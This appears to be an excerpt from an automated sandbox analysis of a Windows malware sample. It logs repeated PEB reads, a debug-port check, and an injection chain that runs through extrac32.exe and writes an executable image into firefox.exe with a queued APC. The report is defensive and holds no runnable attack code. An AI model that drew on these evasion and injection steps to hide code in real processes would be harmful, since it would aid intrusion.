        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C265C mov eax, dword ptr fs:[00000030h]2_2_328C265C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C265C mov ecx, dword ptr fs:[00000030h]2_2_328C265C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C265C mov eax, dword ptr fs:[00000030h]2_2_328C265C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289965A mov eax, dword ptr fs:[00000030h]2_2_3289965A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289965A mov eax, dword ptr fs:[00000030h]2_2_3289965A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C5654 mov eax, dword ptr fs:[00000030h]2_2_328C5654
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C666D mov esi, dword ptr fs:[00000030h]2_2_328C666D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C666D mov eax, dword ptr fs:[00000030h]2_2_328C666D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C666D mov eax, dword ptr fs:[00000030h]2_2_328C666D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A3660 mov eax, dword ptr fs:[00000030h]2_2_328A3660
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A3660 mov eax, dword ptr fs:[00000030h]2_2_328A3660
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A3660 mov eax, dword ptr fs:[00000030h]2_2_328A3660
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32887662 mov eax, dword ptr fs:[00000030h]2_2_32887662
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32887662 mov eax, dword ptr fs:[00000030h]2_2_32887662
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32887662 mov eax, dword ptr fs:[00000030h]2_2_32887662
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32890670 mov eax, dword ptr fs:[00000030h]2_2_32890670
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2670 mov eax, dword ptr fs:[00000030h]2_2_328D2670
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2670 mov eax, dword ptr fs:[00000030h]2_2_328D2670
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E79D mov eax, dword ptr fs:[00000030h]2_2_3290E79D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296B781 mov eax, dword ptr fs:[00000030h]2_2_3296B781
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296B781 mov eax, dword ptr fs:[00000030h]2_2_3296B781
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C1796 mov eax, dword ptr fs:[00000030h]2_2_328C1796
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C1796 mov eax, dword ptr fs:[00000030h]2_2_328C1796
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329617BC mov eax, dword ptr fs:[00000030h]2_2_329617BC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328907A7 mov eax, dword ptr fs:[00000030h]2_2_328907A7
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295D7A7 mov eax, dword ptr fs:[00000030h]2_2_3295D7A7
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295D7A7 mov eax, dword ptr fs:[00000030h]2_2_3295D7A7
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295D7A7 mov eax, dword ptr fs:[00000030h]2_2_3295D7A7
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F7CF mov eax, dword ptr fs:[00000030h]2_2_3294F7CF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BE7E0 mov eax, dword ptr fs:[00000030h]2_2_328BE7E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328937E4 mov eax, dword ptr fs:[00000030h]2_2_328937E4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328937E4 mov eax, dword ptr fs:[00000030h]2_2_328937E4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328937E4 mov eax, dword ptr fs:[00000030h]2_2_328937E4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328937E4 mov eax, dword ptr fs:[00000030h]2_2_328937E4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328937E4 mov eax, dword ptr fs:[00000030h]2_2_328937E4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328937E4 mov eax, dword ptr fs:[00000030h]2_2_328937E4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328937E4 mov eax, dword ptr fs:[00000030h]2_2_328937E4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328977F9 mov eax, dword ptr fs:[00000030h]2_2_328977F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328977F9 mov eax, dword ptr fs:[00000030h]2_2_328977F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F717 mov eax, dword ptr fs:[00000030h]2_2_3294F717
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289170C mov eax, dword ptr fs:[00000030h]2_2_3289170C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289170C mov eax, dword ptr fs:[00000030h]2_2_3289170C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289170C mov eax, dword ptr fs:[00000030h]2_2_3289170C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B270D mov eax, dword ptr fs:[00000030h]2_2_328B270D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B270D mov eax, dword ptr fs:[00000030h]2_2_328B270D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B270D mov eax, dword ptr fs:[00000030h]2_2_328B270D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289D700 mov ecx, dword ptr fs:[00000030h]2_2_3289D700
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B705 mov eax, dword ptr fs:[00000030h]2_2_3288B705
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B705 mov eax, dword ptr fs:[00000030h]2_2_3288B705
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B705 mov eax, dword ptr fs:[00000030h]2_2_3288B705
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B705 mov eax, dword ptr fs:[00000030h]2_2_3288B705
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289471B mov eax, dword ptr fs:[00000030h]2_2_3289471B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289471B mov eax, dword ptr fs:[00000030h]2_2_3289471B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295970B mov eax, dword ptr fs:[00000030h]2_2_3295970B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295970B mov eax, dword ptr fs:[00000030h]2_2_3295970B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B9723 mov eax, dword ptr fs:[00000030h]2_2_328B9723
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3293E750 mov eax, dword ptr fs:[00000030h]2_2_3293E750
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C174A mov eax, dword ptr fs:[00000030h]2_2_328C174A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C3740 mov eax, dword ptr fs:[00000030h]2_2_328C3740
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F75B mov eax, dword ptr fs:[00000030h]2_2_3288F75B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA750 mov eax, dword ptr fs:[00000030h]2_2_328CA750
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B2755 mov eax, dword ptr fs:[00000030h]2_2_328B2755
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B2755 mov eax, dword ptr fs:[00000030h]2_2_328B2755
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B2755 mov eax, dword ptr fs:[00000030h]2_2_328B2755
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B2755 mov ecx, dword ptr fs:[00000030h]2_2_328B2755
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B2755 mov eax, dword ptr fs:[00000030h]2_2_328B2755
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B2755 mov eax, dword ptr fs:[00000030h]2_2_328B2755
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 mov eax, dword ptr fs:[00000030h]2_2_328D1763
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 mov eax, dword ptr fs:[00000030h]2_2_328D1763
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 mov eax, dword ptr fs:[00000030h]2_2_328D1763
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 mov eax, dword ptr fs:[00000030h]2_2_328D1763
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 mov eax, dword ptr fs:[00000030h]2_2_328D1763
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 mov eax, dword ptr fs:[00000030h]2_2_328D1763
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32894779 mov eax, dword ptr fs:[00000030h]2_2_32894779
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32894779 mov eax, dword ptr fs:[00000030h]2_2_32894779
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C0774 mov eax, dword ptr fs:[00000030h]2_2_328C0774
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291C490 mov eax, dword ptr fs:[00000030h]2_2_3291C490
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C648A mov eax, dword ptr fs:[00000030h]2_2_328C648A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C648A mov eax, dword ptr fs:[00000030h]2_2_328C648A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C648A mov eax, dword ptr fs:[00000030h]2_2_328C648A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32890485 mov ecx, dword ptr fs:[00000030h]2_2_32890485
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CB490 mov eax, dword ptr fs:[00000030h]2_2_328CB490
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CB490 mov eax, dword ptr fs:[00000030h]2_2_328CB490
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C44A8 mov eax, dword ptr fs:[00000030h]2_2_328C44A8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328924A2 mov eax, dword ptr fs:[00000030h]2_2_328924A2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328924A2 mov ecx, dword ptr fs:[00000030h]2_2_328924A2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE4BC mov eax, dword ptr fs:[00000030h]2_2_328CE4BC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291D4A0 mov ecx, dword ptr fs:[00000030h]2_2_3291D4A0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291D4A0 mov eax, dword ptr fs:[00000030h]2_2_3291D4A0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291D4A0 mov eax, dword ptr fs:[00000030h]2_2_3291D4A0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B14C9 mov eax, dword ptr fs:[00000030h]2_2_328B14C9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B14C9 mov eax, dword ptr fs:[00000030h]2_2_328B14C9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B14C9 mov eax, dword ptr fs:[00000030h]2_2_328B14C9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B14C9 mov eax, dword ptr fs:[00000030h]2_2_328B14C9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B14C9 mov eax, dword ptr fs:[00000030h]2_2_328B14C9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B44D1 mov eax, dword ptr fs:[00000030h]2_2_328B44D1
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B44D1 mov eax, dword ptr fs:[00000030h]2_2_328B44D1
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF4D0 mov eax, dword ptr fs:[00000030h]2_2_328BF4D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE4EF mov eax, dword ptr fs:[00000030h]2_2_328CE4EF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE4EF mov eax, dword ptr fs:[00000030h]2_2_328CE4EF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F4FD mov eax, dword ptr fs:[00000030h]2_2_3294F4FD
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C54E0 mov eax, dword ptr fs:[00000030h]2_2_328C54E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B94FA mov eax, dword ptr fs:[00000030h]2_2_328B94FA
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328964F0 mov eax, dword ptr fs:[00000030h]2_2_328964F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA4F0 mov eax, dword ptr fs:[00000030h]2_2_328CA4F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA4F0 mov eax, dword ptr fs:[00000030h]2_2_328CA4F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288640D mov eax, dword ptr fs:[00000030h]2_2_3288640D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32926400 mov eax, dword ptr fs:[00000030h]2_2_32926400
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32926400 mov eax, dword ptr fs:[00000030h]2_2_32926400
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F409 mov eax, dword ptr fs:[00000030h]2_2_3294F409
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B420 mov eax, dword ptr fs:[00000030h]2_2_3288B420
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C7425 mov eax, dword ptr fs:[00000030h]2_2_328C7425
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C7425 mov ecx, dword ptr fs:[00000030h]2_2_328C7425
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32919429 mov eax, dword ptr fs:[00000030h]2_2_32919429
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291F42F mov eax, dword ptr fs:[00000030h]2_2_3291F42F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291F42F mov eax, dword ptr fs:[00000030h]2_2_3291F42F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291F42F mov eax, dword ptr fs:[00000030h]2_2_3291F42F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291F42F mov eax, dword ptr fs:[00000030h]2_2_3291F42F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291F42F mov eax, dword ptr fs:[00000030h]2_2_3291F42F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0445 mov eax, dword ptr fs:[00000030h]2_2_328A0445
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0445 mov eax, dword ptr fs:[00000030h]2_2_328A0445
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0445 mov eax, dword ptr fs:[00000030h]2_2_328A0445
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0445 mov eax, dword ptr fs:[00000030h]2_2_328A0445
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0445 mov eax, dword ptr fs:[00000030h]2_2_328A0445
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0445 mov eax, dword ptr fs:[00000030h]2_2_328A0445
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BE45E mov eax, dword ptr fs:[00000030h]2_2_328BE45E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BE45E mov eax, dword ptr fs:[00000030h]2_2_328BE45E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BE45E mov eax, dword ptr fs:[00000030h]2_2_328BE45E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BE45E mov eax, dword ptr fs:[00000030h]2_2_328BE45E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BE45E mov eax, dword ptr fs:[00000030h]2_2_328BE45E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CD450 mov eax, dword ptr fs:[00000030h]2_2_328CD450
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CD450 mov eax, dword ptr fs:[00000030h]2_2_328CD450
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F478 mov eax, dword ptr fs:[00000030h]2_2_3294F478
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295A464 mov eax, dword ptr fs:[00000030h]2_2_3295A464
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32898470 mov eax, dword ptr fs:[00000030h]2_2_32898470
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32898470 mov eax, dword ptr fs:[00000030h]2_2_32898470
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291C592 mov eax, dword ptr fs:[00000030h]2_2_3291C592
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C9580 mov eax, dword ptr fs:[00000030h]2_2_328C9580
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C9580 mov eax, dword ptr fs:[00000030h]2_2_328C9580
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA580 mov eax, dword ptr fs:[00000030h]2_2_328CA580
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA580 mov eax, dword ptr fs:[00000030h]2_2_328CA580
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F582 mov eax, dword ptr fs:[00000030h]2_2_3294F582
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E588 mov eax, dword ptr fs:[00000030h]2_2_3290E588
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E588 mov eax, dword ptr fs:[00000030h]2_2_3290E588
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C2594 mov eax, dword ptr fs:[00000030h]2_2_328C2594
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328945B0 mov eax, dword ptr fs:[00000030h]2_2_328945B0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328945B0 mov eax, dword ptr fs:[00000030h]2_2_328945B0
        Source: C:\Windows\SysWOW64\extrac32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_0040175C LdrInitializeThunk,0_2_0040175C

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeSection loaded: unknown target: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeSection loaded: unknown target: C:\Windows\SysWOW64\extrac32.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: unknown target: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: unknown target: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF716520000Jump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF716520000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeThread APC queued: target process: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exeJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeProcess created: C:\Users\user\Desktop\U6SJBLxT2Z.exe C:\Users\user\Desktop\U6SJBLxT2Z.exeJump to behavior
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\Windows\SysWOW64\extrac32.exeJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000000.11941862291.0000000001421000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000002.16760425598.0000000001420000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000000.12074002494.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000000.11941862291.0000000001421000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000002.16760425598.0000000001420000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000000.12074002494.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000000.11941862291.0000000001421000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000002.16760425598.0000000001420000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000000.12074002494.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .Program ManagerQ
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000000.11941862291.0000000001421000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000002.16760425598.0000000001420000.00000002.00000001.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000000.12074002494.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
